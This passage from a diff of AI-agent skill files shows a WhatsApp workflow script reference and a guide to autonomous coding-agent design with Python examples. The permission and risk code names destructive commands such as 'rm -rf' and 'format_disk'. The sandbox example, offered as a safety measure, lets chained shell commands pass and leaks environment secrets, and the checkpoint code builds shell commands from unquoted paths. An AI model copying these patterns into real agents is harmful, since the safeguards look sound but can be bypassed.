1. Fetch graph: `node scripts/get-graph.js <workflow_id>` (note the `lock_version`)
|
||||
2. Edit the JSON (see graph rules below)
|
||||
3. Validate: `node scripts/validate-graph.js --definition-file <path>`
|
||||
4. Update: `node scripts/update-graph.js <workflow_id> --expected-lock-version <n> --definition-file <path>`
|
||||
5. Re-fetch to confirm
|
||||
|
||||
For small edits, use `edit-graph.js` with `--old-file` and `--new-file` instead.
|
||||
|
||||
If you get a lock_version conflict: re-fetch, re-apply changes, retry with new lock_version.
|
||||
|
||||
### Manage triggers
|
||||
|
||||
1. List: `node scripts/list-triggers.js <workflow_id>`
|
||||
2. Create: `node scripts/create-trigger.js <workflow_id> --trigger-type <type> --phone-number-id <id>`
|
||||
3. Toggle: `node scripts/update-trigger.js --trigger-id <id> --active true|false`
|
||||
4. Delete: `node scripts/delete-trigger.js --trigger-id <id>`
|
||||
|
||||
For inbound_message triggers, first run `node scripts/list-whatsapp-phone-numbers.js` to get `phone_number_id`.
|
||||
|
||||
### Debug executions
|
||||
|
||||
1. List: `node scripts/list-executions.js <workflow_id>`
|
||||
2. Inspect: `node scripts/get-execution.js <execution-id>`
|
||||
3. Get value: `node scripts/get-context-value.js <execution-id> --variable-path vars.foo`
|
||||
4. Events: `node scripts/list-execution-events.js <execution-id>`
|
||||
|
||||
### Create and deploy a function
|
||||
|
||||
1. Write code with handler signature (see function rules below)
|
||||
2. Create: `node scripts/create-function.js --name <name> --code-file <path>`
|
||||
3. Deploy: `node scripts/deploy-function.js --function-id <id>`
|
||||
4. Verify: `node scripts/get-function.js --function-id <id>`
|
||||
|
||||
### Set up agent node with app integrations
|
||||
|
||||
1. Find model: `node scripts/list-provider-models.js`
|
||||
2. Find account: `node scripts/list-accounts.js --app-slug <slug>` (use `pipedream_account_id`)
|
||||
3. Find action: `node scripts/search-actions.js --query <word> --app-slug <slug>` (action_id = key)
|
||||
4. Create integration: `node scripts/create-integration.js --action-id <id> --app-slug <slug> --account-id <id> --configured-props <json>`
|
||||
5. Add tools to agent node via `flow_agent_app_integration_tools`
|
||||
|
||||
### Database CRUD
|
||||
|
||||
1. List tables: `node scripts/list-tables.js`
|
||||
2. Query: `node scripts/query-rows.js --table <name> --filters <json>`
|
||||
3. Create/update/delete with row scripts
|
||||
|
||||
## Graph rules
|
||||
|
||||
- Exactly one start node with `id` = `start`
|
||||
- Never change existing node IDs
|
||||
- Use `{node_type}_{timestamp_ms}` for new node IDs
|
||||
- Non-decide nodes have 0 or 1 outgoing `next` edge
|
||||
- Decide edge labels must match `conditions[].label`
|
||||
- Edge keys are `source`/`target`/`label` (not `from`/`to`)
|
||||
|
||||
For full schema details, see `references/graph-contract.md`.
|
||||
|
||||
## Function rules
|
||||
|
||||
```js
|
||||
async function handler(request, env) {
|
||||
// Parse input
|
||||
const body = await request.json();
|
||||
// Use env.KV and env.DB as needed
|
||||
return new Response(JSON.stringify({ result: "ok" }));
|
||||
}
|
||||
```
|
||||
|
||||
- Do NOT use `export`, `export default`, or arrow functions
|
||||
- Return a `Response` object
|
||||
|
||||
## Execution context
|
||||
|
||||
Always use this structure:
|
||||
- `vars` - user-defined variables
|
||||
- `system` - system variables
|
||||
- `context` - channel data
|
||||
- `metadata` - request metadata
|
||||
|
||||
## Scripts
|
||||
|
||||
### Workflows
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-workflows.js` | List workflows (metadata only) |
|
||||
| `get-workflow.js` | Get workflow metadata |
|
||||
| `create-workflow.js` | Create a workflow |
|
||||
| `update-workflow-settings.js` | Update workflow settings |
|
||||
|
||||
### Graph
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `get-graph.js` | Get workflow graph + lock_version |
|
||||
| `edit-graph.js` | Patch graph via string replacement |
|
||||
| `update-graph.js` | Replace entire graph |
|
||||
| `validate-graph.js` | Validate graph structure locally |
|
||||
|
||||
### Triggers
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-triggers.js` | List triggers for a workflow |
|
||||
| `create-trigger.js` | Create a trigger |
|
||||
| `update-trigger.js` | Enable/disable a trigger |
|
||||
| `delete-trigger.js` | Delete a trigger |
|
||||
| `list-whatsapp-phone-numbers.js` | List phone numbers for trigger setup |
|
||||
|
||||
### Executions
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-executions.js` | List executions |
|
||||
| `get-execution.js` | Get execution details |
|
||||
| `get-context-value.js` | Read value from execution context |
|
||||
| `update-execution-status.js` | Force execution state |
|
||||
| `resume-execution.js` | Resume waiting execution |
|
||||
| `list-execution-events.js` | List execution events |
|
||||
|
||||
### Functions
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-functions.js` | List project functions |
|
||||
| `get-function.js` | Get function details + code |
|
||||
| `create-function.js` | Create a function |
|
||||
| `update-function.js` | Update function code |
|
||||
| `deploy-function.js` | Deploy function to runtime |
|
||||
| `invoke-function.js` | Invoke function with payload |
|
||||
| `list-function-invocations.js` | List function invocations |
|
||||
|
||||
### App integrations
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-apps.js` | Search integration apps |
|
||||
| `search-actions.js` | Search actions (action_id = key) |
|
||||
| `get-action-schema.js` | Get action JSON schema |
|
||||
| `list-accounts.js` | List connected accounts |
|
||||
| `create-connect-token.js` | Create OAuth connect link |
|
||||
| `configure-prop.js` | Resolve remote_options for a prop |
|
||||
| `reload-props.js` | Reload dynamic props |
|
||||
| `list-integrations.js` | List saved integrations |
|
||||
| `create-integration.js` | Create an integration |
|
||||
| `update-integration.js` | Update an integration |
|
||||
| `delete-integration.js` | Delete an integration |
|
||||
|
||||
### Databases
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `list-tables.js` | List D1 tables |
|
||||
| `get-table.js` | Get table schema + sample rows |
|
||||
| `query-rows.js` | Query rows with filters |
|
||||
| `create-row.js` | Create a row |
|
||||
| `update-row.js` | Update rows |
|
||||
| `upsert-row.js` | Upsert a row |
|
||||
| `delete-row.js` | Delete rows |
|
||||
|
||||
### OpenAPI
|
||||
|
||||
| Script | Purpose |
|
||||
|--------|---------|
|
||||
| `openapi-explore.mjs` | Explore OpenAPI (search/op/schema/where) |
|
||||
|
||||
Install deps (once):
|
||||
```bash
|
||||
npm i
|
||||
```
|
||||
|
||||
Examples:
|
||||
```bash
|
||||
node scripts/openapi-explore.mjs --spec workflows search "variables"
|
||||
node scripts/openapi-explore.mjs --spec workflows op getWorkflowVariables
|
||||
node scripts/openapi-explore.mjs --spec platform op queryDatabaseRows
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
- Prefer file paths over inline JSON (`--definition-file`, `--code-file`)
|
||||
- `action_id` is the same as `key` from `search-actions`
|
||||
- `--account-id` uses `pipedream_account_id` from `list-accounts`
|
||||
- Variable CRUD (`variables-set.js`, `variables-delete.js`) is blocked - Platform API doesn't support it
|
||||
- Raw SQL execution is not supported via Platform API
|
||||
|
||||
## References
|
||||
|
||||
Read before editing:
|
||||
- references/graph-contract.md - Graph schema, computed vs editable fields, lock_version
|
||||
- references/node-types.md - Node types and config shapes
|
||||
- references/workflow-overview.md - Execution flow and states
|
||||
|
||||
Other references:
|
||||
- references/execution-context.md - Context structure and variable substitution
|
||||
- references/triggers.md - Trigger types and setup
|
||||
- references/app-integrations.md - App integration and variable_definitions
|
||||
- references/functions-reference.md - Function management
|
||||
- references/functions-payloads.md - Payload shapes for functions
|
||||
- references/databases-reference.md - Database operations
|
||||
|
||||
## Assets
|
||||
|
||||
| File | Description |
|
||||
|------|-------------|
|
||||
| `workflow-linear.json` | Minimal linear workflow |
|
||||
| `workflow-decision.json` | Minimal branching workflow |
|
||||
| `workflow-agent-simple.json` | Minimal agent workflow |
|
||||
| `workflow-customer-support-intake-agent.json` | Customer support intake |
|
||||
| `workflow-interactive-buttons-decide-function.json` | Interactive buttons + decide (function) |
|
||||
| `workflow-interactive-buttons-decide-ai.json` | Interactive buttons + decide (AI) |
|
||||
| `workflow-api-template-wait-agent.json` | API trigger + template + agent |
|
||||
| `function-decide-route-interactive-buttons.json` | Function for button routing |
|
||||
| `agent-app-integration-example.json` | Agent node with app integrations |
|
||||
|
||||
## Related skills
|
||||
|
||||
- `integrate-whatsapp` - Onboarding, webhooks, messaging, templates, flows
|
||||
- `observe-whatsapp` - Debugging, logs, health checks
|
||||
|
||||
<!-- FILEMAP:BEGIN -->
|
||||
```text
|
||||
[automate-whatsapp file map]|root: .
|
||||
|.:{package.json,SKILL.md}
|
||||
|assets:{agent-app-integration-example.json,databases-example.json,function-decide-route-interactive-buttons.json,functions-example.json,workflow-agent-simple.json,workflow-api-template-wait-agent.json,workflow-customer-support-intake-agent.json,workflow-decision.json,workflow-interactive-buttons-decide-ai.json,workflow-interactive-buttons-decide-function.json,workflow-linear.json}
|
||||
|references:{app-integrations.md,databases-reference.md,execution-context.md,function-contracts.md,functions-payloads.md,functions-reference.md,graph-contract.md,node-types.md,triggers.md,workflow-overview.md,workflow-reference.md}
|
||||
|scripts:{configure-prop.js,create-connect-token.js,create-function.js,create-integration.js,create-row.js,create-trigger.js,create-workflow.js,delete-integration.js,delete-row.js,delete-trigger.js,deploy-function.js,edit-graph.js,get-action-schema.js,get-context-value.js,get-execution-event.js,get-execution.js,get-function.js,get-graph.js,get-table.js,get-workflow.js,invoke-function.js,list-accounts.js,list-apps.js,list-execution-events.js,list-executions.js,list-function-invocations.js,list-functions.js,list-integrations.js,list-provider-models.js,list-tables.js,list-triggers.js,list-whatsapp-phone-numbers.js,list-workflows.js,openapi-explore.mjs,query-rows.js,reload-props.js,resume-execution.js,search-actions.js,update-execution-status.js,update-function.js,update-graph.js,update-integration.js,update-row.js,update-trigger.js,update-workflow-settings.js,upsert-row.js,validate-graph.js,variables-delete.js,variables-list.js,variables-set.js}
|
||||
|scripts/lib/databases:{args.js,filters.js,kapso-api.js}
|
||||
|scripts/lib/functions:{args.js,kapso-api.js}
|
||||
|scripts/lib/workflows:{args.js,kapso-api.js,result.js}
|
||||
```
|
||||
<!-- FILEMAP:END -->
|
||||
|
||||
764
packages/llm/skills/autonomous-agent-patterns/SKILL.md
Normal file
764
packages/llm/skills/autonomous-agent-patterns/SKILL.md
Normal file
@ -0,0 +1,764 @@
|
||||
---
|
||||
name: autonomous-agent-patterns
|
||||
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool ..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# 🕹️ Autonomous Agent Patterns
|
||||
|
||||
> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Building autonomous AI agents
|
||||
- Designing tool/function calling APIs
|
||||
- Implementing permission and approval systems
|
||||
- Creating browser automation for agents
|
||||
- Designing human-in-the-loop workflows
|
||||
|
||||
---
|
||||
|
||||
## 1. Core Agent Architecture
|
||||
|
||||
### 1.1 Agent Loop
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ AGENT LOOP │
|
||||
│ │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Think │───▶│ Decide │───▶│ Act │ │
|
||||
│ │ (Reason) │ │ (Plan) │ │ (Execute)│ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ▲ │ │
|
||||
│ │ ┌──────────┐ │ │
|
||||
│ └─────────│ Observe │◀─────────┘ │
|
||||
│ │ (Result) │ │
|
||||
│ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
```python
|
||||
class AgentLoop:
|
||||
def __init__(self, llm, tools, max_iterations=50):
|
||||
self.llm = llm
|
||||
self.tools = {t.name: t for t in tools}
|
||||
self.max_iterations = max_iterations
|
||||
self.history = []
|
||||
|
||||
def run(self, task: str) -> str:
|
||||
self.history.append({"role": "user", "content": task})
|
||||
|
||||
for i in range(self.max_iterations):
|
||||
# Think: Get LLM response with tool options
|
||||
response = self.llm.chat(
|
||||
messages=self.history,
|
||||
tools=self._format_tools(),
|
||||
tool_choice="auto"
|
||||
)
|
||||
|
||||
# Decide: Check if agent wants to use a tool
|
||||
if response.tool_calls:
|
||||
for tool_call in response.tool_calls:
|
||||
# Act: Execute the tool
|
||||
result = self._execute_tool(tool_call)
|
||||
|
||||
# Observe: Add result to history
|
||||
self.history.append({
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call.id,
|
||||
"content": str(result)
|
||||
})
|
||||
else:
|
||||
# No more tool calls = task complete
|
||||
return response.content
|
||||
|
||||
return "Max iterations reached"
|
||||
|
||||
def _execute_tool(self, tool_call) -> Any:
|
||||
tool = self.tools[tool_call.name]
|
||||
args = json.loads(tool_call.arguments)
|
||||
return tool.execute(**args)
|
||||
```
|
||||
|
||||
### 1.2 Multi-Model Architecture
|
||||
|
||||
```python
|
||||
class MultiModelAgent:
|
||||
"""
|
||||
Use different models for different purposes:
|
||||
- Fast model for planning
|
||||
- Powerful model for complex reasoning
|
||||
- Specialized model for code generation
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.models = {
|
||||
"fast": "gpt-3.5-turbo", # Quick decisions
|
||||
"smart": "gpt-4-turbo", # Complex reasoning
|
||||
"code": "claude-3-sonnet", # Code generation
|
||||
}
|
||||
|
||||
def select_model(self, task_type: str) -> str:
|
||||
if task_type == "planning":
|
||||
return self.models["fast"]
|
||||
elif task_type == "analysis":
|
||||
return self.models["smart"]
|
||||
elif task_type == "code":
|
||||
return self.models["code"]
|
||||
return self.models["smart"]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Tool Design Patterns
|
||||
|
||||
### 2.1 Tool Schema
|
||||
|
||||
```python
|
||||
class Tool:
|
||||
"""Base class for agent tools"""
|
||||
|
||||
@property
|
||||
def schema(self) -> dict:
|
||||
"""JSON Schema for the tool"""
|
||||
return {
|
||||
"name": self.name,
|
||||
"description": self.description,
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": self._get_parameters(),
|
||||
"required": self._get_required()
|
||||
}
|
||||
}
|
||||
|
||||
def execute(self, **kwargs) -> ToolResult:
|
||||
"""Execute the tool and return result"""
|
||||
raise NotImplementedError
|
||||
|
||||
class ReadFileTool(Tool):
|
||||
name = "read_file"
|
||||
description = "Read the contents of a file from the filesystem"
|
||||
|
||||
def _get_parameters(self):
|
||||
return {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Absolute path to the file"
|
||||
},
|
||||
"start_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to start reading from (1-indexed)"
|
||||
},
|
||||
"end_line": {
|
||||
"type": "integer",
|
||||
"description": "Line to stop reading at (inclusive)"
|
||||
}
|
||||
}
|
||||
|
||||
def _get_required(self):
|
||||
return ["path"]
|
||||
|
||||
def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
|
||||
try:
|
||||
with open(path, 'r') as f:
|
||||
lines = f.readlines()
|
||||
|
||||
if start_line and end_line:
|
||||
lines = lines[start_line-1:end_line]
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output="".join(lines)
|
||||
)
|
||||
except FileNotFoundError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"File not found: {path}"
|
||||
)
|
||||
```
|
||||
|
||||
### 2.2 Essential Agent Tools
|
||||
|
||||
```python
|
||||
CODING_AGENT_TOOLS = {
|
||||
# File operations
|
||||
"read_file": "Read file contents",
|
||||
"write_file": "Create or overwrite a file",
|
||||
"edit_file": "Make targeted edits to a file",
|
||||
"list_directory": "List files and folders",
|
||||
"search_files": "Search for files by pattern",
|
||||
|
||||
# Code understanding
|
||||
"search_code": "Search for code patterns (grep)",
|
||||
"get_definition": "Find function/class definition",
|
||||
"get_references": "Find all references to a symbol",
|
||||
|
||||
# Terminal
|
||||
"run_command": "Execute a shell command",
|
||||
"read_output": "Read command output",
|
||||
"send_input": "Send input to running command",
|
||||
|
||||
# Browser (optional)
|
||||
"open_browser": "Open URL in browser",
|
||||
"click_element": "Click on page element",
|
||||
"type_text": "Type text into input",
|
||||
"screenshot": "Capture screenshot",
|
||||
|
||||
# Context
|
||||
"ask_user": "Ask the user a question",
|
||||
"search_web": "Search the web for information"
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 Edit Tool Design
|
||||
|
||||
```python
|
||||
class EditFileTool(Tool):
|
||||
"""
|
||||
Precise file editing with conflict detection.
|
||||
Uses search/replace pattern for reliable edits.
|
||||
"""
|
||||
|
||||
name = "edit_file"
|
||||
description = "Edit a file by replacing specific content"
|
||||
|
||||
def execute(
|
||||
self,
|
||||
path: str,
|
||||
search: str,
|
||||
replace: str,
|
||||
expected_occurrences: int = 1
|
||||
) -> ToolResult:
|
||||
"""
|
||||
Args:
|
||||
path: File to edit
|
||||
search: Exact text to find (must match exactly, including whitespace)
|
||||
replace: Text to replace with
|
||||
expected_occurrences: How many times search should appear (validation)
|
||||
"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
# Validate
|
||||
actual_occurrences = content.count(search)
|
||||
if actual_occurrences != expected_occurrences:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
|
||||
)
|
||||
|
||||
if actual_occurrences == 0:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error="Search text not found in file"
|
||||
)
|
||||
|
||||
# Apply edit
|
||||
new_content = content.replace(search, replace)
|
||||
|
||||
with open(path, 'w') as f:
|
||||
f.write(new_content)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Replaced {actual_occurrences} occurrence(s)"
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Permission & Safety Patterns
|
||||
|
||||
### 3.1 Permission Levels
|
||||
|
||||
```python
|
||||
class PermissionLevel(Enum):
|
||||
# Fully automatic - no user approval needed
|
||||
AUTO = "auto"
|
||||
|
||||
# Ask once per session
|
||||
ASK_ONCE = "ask_once"
|
||||
|
||||
# Ask every time
|
||||
ASK_EACH = "ask_each"
|
||||
|
||||
# Never allow
|
||||
NEVER = "never"
|
||||
|
||||
PERMISSION_CONFIG = {
|
||||
# Low risk - can auto-approve
|
||||
"read_file": PermissionLevel.AUTO,
|
||||
"list_directory": PermissionLevel.AUTO,
|
||||
"search_code": PermissionLevel.AUTO,
|
||||
|
||||
# Medium risk - ask once
|
||||
"write_file": PermissionLevel.ASK_ONCE,
|
||||
"edit_file": PermissionLevel.ASK_ONCE,
|
||||
|
||||
# High risk - ask each time
|
||||
"run_command": PermissionLevel.ASK_EACH,
|
||||
"delete_file": PermissionLevel.ASK_EACH,
|
||||
|
||||
# Dangerous - never auto-approve
|
||||
"sudo_command": PermissionLevel.NEVER,
|
||||
"format_disk": PermissionLevel.NEVER
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 Approval UI Pattern
|
||||
|
||||
```python
|
||||
class ApprovalManager:
|
||||
def __init__(self, ui, config):
|
||||
self.ui = ui
|
||||
self.config = config
|
||||
self.session_approvals = {}
|
||||
|
||||
def request_approval(self, tool_name: str, args: dict) -> bool:
|
||||
level = self.config.get(tool_name, PermissionLevel.ASK_EACH)
|
||||
|
||||
if level == PermissionLevel.AUTO:
|
||||
return True
|
||||
|
||||
if level == PermissionLevel.NEVER:
|
||||
self.ui.show_error(f"Tool '{tool_name}' is not allowed")
|
||||
return False
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
if tool_name in self.session_approvals:
|
||||
return self.session_approvals[tool_name]
|
||||
|
||||
# Show approval dialog
|
||||
approved = self.ui.show_approval_dialog(
|
||||
tool=tool_name,
|
||||
args=args,
|
||||
risk_level=self._assess_risk(tool_name, args)
|
||||
)
|
||||
|
||||
if level == PermissionLevel.ASK_ONCE:
|
||||
self.session_approvals[tool_name] = approved
|
||||
|
||||
return approved
|
||||
|
||||
def _assess_risk(self, tool_name: str, args: dict) -> str:
|
||||
"""Analyze specific call for risk level"""
|
||||
if tool_name == "run_command":
|
||||
cmd = args.get("command", "")
|
||||
if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
|
||||
return "HIGH"
|
||||
return "MEDIUM"
|
||||
```
|
||||
|
||||
### 3.3 Sandboxing
|
||||
|
||||
```python
|
||||
class SandboxedExecution:
|
||||
"""
|
||||
Execute code/commands in isolated environment
|
||||
"""
|
||||
|
||||
def __init__(self, workspace_dir: str):
|
||||
self.workspace = workspace_dir
|
||||
self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
|
||||
self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]
|
||||
|
||||
def validate_path(self, path: str) -> bool:
|
||||
"""Ensure path is within workspace"""
|
||||
real_path = os.path.realpath(path)
|
||||
workspace_real = os.path.realpath(self.workspace)
|
||||
return real_path.startswith(workspace_real)
|
||||
|
||||
def validate_command(self, command: str) -> bool:
|
||||
"""Check if command is allowed"""
|
||||
cmd_parts = shlex.split(command)
|
||||
if not cmd_parts:
|
||||
return False
|
||||
|
||||
base_cmd = cmd_parts[0]
|
||||
return base_cmd in self.allowed_commands
|
||||
|
||||
def execute_sandboxed(self, command: str) -> ToolResult:
|
||||
if not self.validate_command(command):
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Command not allowed: {command}"
|
||||
)
|
||||
|
||||
# Execute in isolated environment
|
||||
result = subprocess.run(
|
||||
command,
|
||||
shell=True,
|
||||
cwd=self.workspace,
|
||||
capture_output=True,
|
||||
timeout=30,
|
||||
env={
|
||||
**os.environ,
|
||||
"HOME": self.workspace, # Isolate home directory
|
||||
}
|
||||
)
|
||||
|
||||
return ToolResult(
|
||||
success=result.returncode == 0,
|
||||
output=result.stdout.decode(),
|
||||
error=result.stderr.decode() if result.returncode != 0 else None
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Browser Automation
|
||||
|
||||
### 4.1 Browser Tool Pattern
|
||||
|
||||
```python
|
||||
class BrowserTool:
|
||||
"""
|
||||
Browser automation for agents using Playwright/Puppeteer.
|
||||
Enables visual debugging and web testing.
|
||||
"""
|
||||
|
||||
def __init__(self, headless: bool = True):
|
||||
self.browser = None
|
||||
self.page = None
|
||||
self.headless = headless
|
||||
|
||||
async def open_url(self, url: str) -> ToolResult:
|
||||
"""Navigate to URL and return page info"""
|
||||
if not self.browser:
|
||||
self.browser = await playwright.chromium.launch(headless=self.headless)
|
||||
self.page = await self.browser.new_page()
|
||||
|
||||
await self.page.goto(url)
|
||||
|
||||
# Capture state
|
||||
screenshot = await self.page.screenshot(type='png')
|
||||
title = await self.page.title()
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Loaded: {title}",
|
||||
metadata={
|
||||
"screenshot": base64.b64encode(screenshot).decode(),
|
||||
"url": self.page.url
|
||||
}
|
||||
)
|
||||
|
||||
async def click(self, selector: str) -> ToolResult:
|
||||
"""Click on an element"""
|
||||
try:
|
||||
await self.page.click(selector, timeout=5000)
|
||||
await self.page.wait_for_load_state("networkidle")
|
||||
|
||||
screenshot = await self.page.screenshot()
|
||||
return ToolResult(
|
||||
success=True,
|
||||
output=f"Clicked: {selector}",
|
||||
metadata={"screenshot": base64.b64encode(screenshot).decode()}
|
||||
)
|
||||
except TimeoutError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Element not found: {selector}"
|
||||
)
|
||||
|
||||
async def type_text(self, selector: str, text: str) -> ToolResult:
|
||||
"""Type text into an input"""
|
||||
await self.page.fill(selector, text)
|
||||
return ToolResult(success=True, output=f"Typed into {selector}")
|
||||
|
||||
async def get_page_content(self) -> ToolResult:
|
||||
"""Get accessible text content of the page"""
|
||||
content = await self.page.evaluate("""
|
||||
() => {
|
||||
// Get visible text
|
||||
const walker = document.createTreeWalker(
|
||||
document.body,
|
||||
NodeFilter.SHOW_TEXT,
|
||||
null,
|
||||
false
|
||||
);
|
||||
|
||||
let text = '';
|
||||
while (walker.nextNode()) {
|
||||
const node = walker.currentNode;
|
||||
if (node.textContent.trim()) {
|
||||
text += node.textContent.trim() + '\\n';
|
||||
}
|
||||
}
|
||||
return text;
|
||||
}
|
||||
""")
|
||||
return ToolResult(success=True, output=content)
|
||||
```
|
||||
|
||||
### 4.2 Visual Agent Pattern
|
||||
|
||||
```python
|
||||
class VisualAgent:
|
||||
"""
|
||||
Agent that uses screenshots to understand web pages.
|
||||
Can identify elements visually without selectors.
|
||||
"""
|
||||
|
||||
def __init__(self, llm, browser):
|
||||
self.llm = llm
|
||||
self.browser = browser
|
||||
|
||||
async def describe_page(self) -> str:
|
||||
"""Use vision model to describe current page"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
return response.content
|
||||
|
||||
async def find_and_click(self, description: str) -> ToolResult:
|
||||
"""Find element by visual description and click it"""
|
||||
screenshot = await self.browser.screenshot()
|
||||
|
||||
# Ask vision model to find element
|
||||
response = self.llm.chat([
|
||||
{
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": f"""
|
||||
Find the element matching: "{description}"
|
||||
Return the approximate coordinates as JSON: {{"x": number, "y": number}}
|
||||
"""
|
||||
},
|
||||
{"type": "image", "data": screenshot}
|
||||
]
|
||||
}
|
||||
])
|
||||
|
||||
coords = json.loads(response.content)
|
||||
await self.browser.page.mouse.click(coords["x"], coords["y"])
|
||||
|
||||
return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Context Management
|
||||
|
||||
### 5.1 Context Injection Patterns
|
||||
|
||||
````python
|
||||
class ContextManager:
|
||||
"""
|
||||
Manage context provided to the agent.
|
||||
Inspired by Cline's @-mention patterns.
|
||||
"""
|
||||
|
||||
def __init__(self, workspace: str):
|
||||
self.workspace = workspace
|
||||
self.context = []
|
||||
|
||||
def add_file(self, path: str) -> None:
|
||||
"""@file - Add file contents to context"""
|
||||
with open(path, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
self.context.append({
|
||||
"type": "file",
|
||||
"path": path,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_folder(self, path: str, max_files: int = 20) -> None:
|
||||
"""@folder - Add all files in folder"""
|
||||
for root, dirs, files in os.walk(path):
|
||||
for file in files[:max_files]:
|
||||
file_path = os.path.join(root, file)
|
||||
self.add_file(file_path)
|
||||
|
||||
def add_url(self, url: str) -> None:
|
||||
"""@url - Fetch and add URL content"""
|
||||
response = requests.get(url)
|
||||
content = html_to_markdown(response.text)
|
||||
|
||||
self.context.append({
|
||||
"type": "url",
|
||||
"url": url,
|
||||
"content": content
|
||||
})
|
||||
|
||||
def add_problems(self, diagnostics: list) -> None:
|
||||
"""@problems - Add IDE diagnostics"""
|
||||
self.context.append({
|
||||
"type": "diagnostics",
|
||||
"problems": diagnostics
|
||||
})
|
||||
|
||||
def format_for_prompt(self) -> str:
|
||||
"""Format all context for LLM prompt"""
|
||||
parts = []
|
||||
for item in self.context:
|
||||
if item["type"] == "file":
|
||||
parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
|
||||
elif item["type"] == "url":
|
||||
parts.append(f"## URL: {item['url']}\n{item['content']}")
|
||||
elif item["type"] == "diagnostics":
|
||||
parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")
|
||||
|
||||
return "\n\n".join(parts)
|
||||
````
|
||||
|
||||
### 5.2 Checkpoint/Resume
|
||||
|
||||
```python
|
||||
class CheckpointManager:
|
||||
"""
|
||||
Save and restore agent state for long-running tasks.
|
||||
"""
|
||||
|
||||
def __init__(self, storage_dir: str):
|
||||
self.storage_dir = storage_dir
|
||||
os.makedirs(storage_dir, exist_ok=True)
|
||||
|
||||
def save_checkpoint(self, session_id: str, state: dict) -> str:
|
||||
"""Save current agent state"""
|
||||
checkpoint = {
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
"session_id": session_id,
|
||||
"history": state["history"],
|
||||
"context": state["context"],
|
||||
"workspace_state": self._capture_workspace(state["workspace"]),
|
||||
"metadata": state.get("metadata", {})
|
||||
}
|
||||
|
||||
path = os.path.join(self.storage_dir, f"{session_id}.json")
|
||||
with open(path, 'w') as f:
|
||||
json.dump(checkpoint, f, indent=2)
|
||||
|
||||
return path
|
||||
|
||||
def restore_checkpoint(self, checkpoint_path: str) -> dict:
|
||||
"""Restore agent state from checkpoint"""
|
||||
with open(checkpoint_path, 'r') as f:
|
||||
checkpoint = json.load(f)
|
||||
|
||||
return {
|
||||
"history": checkpoint["history"],
|
||||
"context": checkpoint["context"],
|
||||
"workspace": self._restore_workspace(checkpoint["workspace_state"]),
|
||||
"metadata": checkpoint["metadata"]
|
||||
}
|
||||
|
||||
def _capture_workspace(self, workspace: str) -> dict:
|
||||
"""Capture relevant workspace state"""
|
||||
# Git status, file hashes, etc.
|
||||
return {
|
||||
"git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
|
||||
"git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. MCP (Model Context Protocol) Integration
|
||||
